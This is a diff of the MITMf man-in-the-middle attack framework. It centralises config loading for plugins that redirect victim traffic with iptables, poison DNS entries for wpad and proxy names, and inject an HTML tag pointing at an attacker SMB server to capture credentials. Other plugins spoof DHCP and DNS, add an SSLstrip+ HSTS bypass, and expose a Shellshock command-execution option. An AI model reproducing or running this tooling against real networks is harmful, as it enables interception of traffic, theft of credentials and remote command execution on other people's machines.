self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
|
||||||
|
|
||||||
msfcfg = ConfigObj('./config/mitmf.cfg')['Metasploit']
|
try:
|
||||||
self.javacfg = ConfigObj('./config/javapwn.cfg')
|
msfcfg = options.configfile['MITMf']['Metasploit']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
|
||||||
|
|
||||||
|
try:
|
||||||
|
self.javacfg = options.configfile['JavaPwn']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
|
||||||
|
|
||||||
self.msfport = msfcfg['msfport']
|
self.msfport = msfcfg['msfport']
|
||||||
self.rpcip = msfcfg['rpcip']
|
self.rpcip = msfcfg['rpcip']
|
||||||
|
|
|
@ -23,6 +23,11 @@ class Responder(Plugin):
|
||||||
if os.geteuid() != 0:
|
if os.geteuid() != 0:
|
||||||
sys.exit("[-] Responder plugin requires root privileges")
|
sys.exit("[-] Responder plugin requires root privileges")
|
||||||
|
|
||||||
|
try:
|
||||||
|
config = options.configfile['Responder']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.ip_address = get_if_addr(options.interface)
|
self.ip_address = get_if_addr(options.interface)
|
||||||
if self.ip_address == "0.0.0.0":
|
if self.ip_address == "0.0.0.0":
|
||||||
|
@ -32,16 +37,16 @@ class Responder(Plugin):
|
||||||
|
|
||||||
print "[*] Responder plugin online"
|
print "[*] Responder plugin online"
|
||||||
DnsCache.getInstance().setCustomAddress(self.ip_address)
|
DnsCache.getInstance().setCustomAddress(self.ip_address)
|
||||||
DnsCache.getInstance().setCustomRes('wpad', self.ip_address)
|
|
||||||
DnsCache.getInstance().setCustomRes('ISAProxySrv', self.ip_address)
|
for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']:
|
||||||
DnsCache.getInstance().setCustomRes('RespProxySrv', self.ip_address)
|
DnsCache.getInstance().setCustomRes(name, self.ip_address)
|
||||||
|
|
||||||
if '--spoof' not in sys.argv:
|
if '--spoof' not in sys.argv:
|
||||||
print '[*] Setting up iptables'
|
print '[*] Setting up iptables'
|
||||||
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
||||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
|
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
|
||||||
|
|
||||||
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address))
|
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config))
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,9 @@
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.Inject import Inject
|
from plugins.Inject import Inject
|
||||||
|
import sys
|
||||||
|
import logging
|
||||||
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||||
|
from scapy.all import get_if_addr
|
||||||
|
|
||||||
|
|
||||||
class SMBAuth(Inject, Plugin):
|
class SMBAuth(Inject, Plugin):
|
||||||
|
@ -11,10 +15,19 @@ class SMBAuth(Inject, Plugin):
|
||||||
Inject.initialize(self, options)
|
Inject.initialize(self, options)
|
||||||
self.target_ip = options.host
|
self.target_ip = options.host
|
||||||
self.html_payload = self._get_data()
|
self.html_payload = self._get_data()
|
||||||
|
|
||||||
|
if self.target_ip is None:
|
||||||
|
try:
|
||||||
|
self.target_ip = get_if_addr(options.interface)
|
||||||
|
if self.target_ip == "0.0.0.0":
|
||||||
|
sys.exit("[-] Interface %s does not have an IP address" % options.interface)
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error retrieving interface IP address: %s" % e)
|
||||||
|
|
||||||
print "[*] SMBAuth plugin online"
|
print "[*] SMBAuth plugin online"
|
||||||
|
|
||||||
def add_options(self, options):
|
def add_options(self, options):
|
||||||
options.add_argument("--host", type=str, help="The ip address of your capture server")
|
options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")
|
||||||
|
|
||||||
def _get_data(self):
|
def _get_data(self):
|
||||||
return '<img src=\"\\\\%s\\image.jpg\">'\
|
return '<img src=\"\\\\%s\\image.jpg\">'\
|
||||||
|
|
20
plugins/SSLstrip+.py
Normal file
20
plugins/SSLstrip+.py
Normal file
|
@ -0,0 +1,20 @@
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from libs.sslstrip.URLMonitor import URLMonitor
|
||||||
|
import sys
|
||||||
|
|
||||||
|
class HSTSbypass(Plugin):
|
||||||
|
name = 'SSLstrip+'
|
||||||
|
optname = 'hsts'
|
||||||
|
desc = 'Enables SSLstrip+ for partial HSTS bypass'
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
self.options = options
|
||||||
|
|
||||||
|
try:
|
||||||
|
config = options.configfile['SSLstrip+']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
|
||||||
|
|
||||||
|
print "[*] SSLstrip+ plugin online"
|
||||||
|
URLMonitor.getInstance().setHstsBypass(config)
|
|
@ -20,7 +20,6 @@ from base64 import b64decode
|
||||||
from urllib import unquote
|
from urllib import unquote
|
||||||
import binascii
|
import binascii
|
||||||
import random
|
import random
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
|
|
||||||
class Spoof(Plugin):
|
class Spoof(Plugin):
|
||||||
|
@ -93,7 +92,7 @@ class Spoof(Plugin):
|
||||||
|
|
||||||
self.rand_number = []
|
self.rand_number = []
|
||||||
self.dhcp_dic = {}
|
self.dhcp_dic = {}
|
||||||
self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
|
self.dhcpcfg = options.configfile['Spoof']['DHCP']
|
||||||
|
|
||||||
thread_target = self.dhcp_sniff
|
thread_target = self.dhcp_sniff
|
||||||
thread_args = ()
|
thread_args = ()
|
||||||
|
@ -109,9 +108,9 @@ class Spoof(Plugin):
|
||||||
print "[*] DNS Tampering enabled"
|
print "[*] DNS Tampering enabled"
|
||||||
|
|
||||||
if self.dns:
|
if self.dns:
|
||||||
self.dnscfg = ConfigObj("./config/dns.cfg")
|
self.dnscfg = options.configfile['Spoof']['DNS']
|
||||||
|
|
||||||
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
|
self.hstscfg = options.configfile['SSLstrip+']
|
||||||
|
|
||||||
if not self.manualiptables:
|
if not self.manualiptables:
|
||||||
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
|
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
|
||||||
|
@ -334,7 +333,7 @@ class Spoof(Plugin):
|
||||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
||||||
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
||||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
|
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
|
||||||
options.add_argument('--shellshock', type=str, dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||||
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
||||||
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
|
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue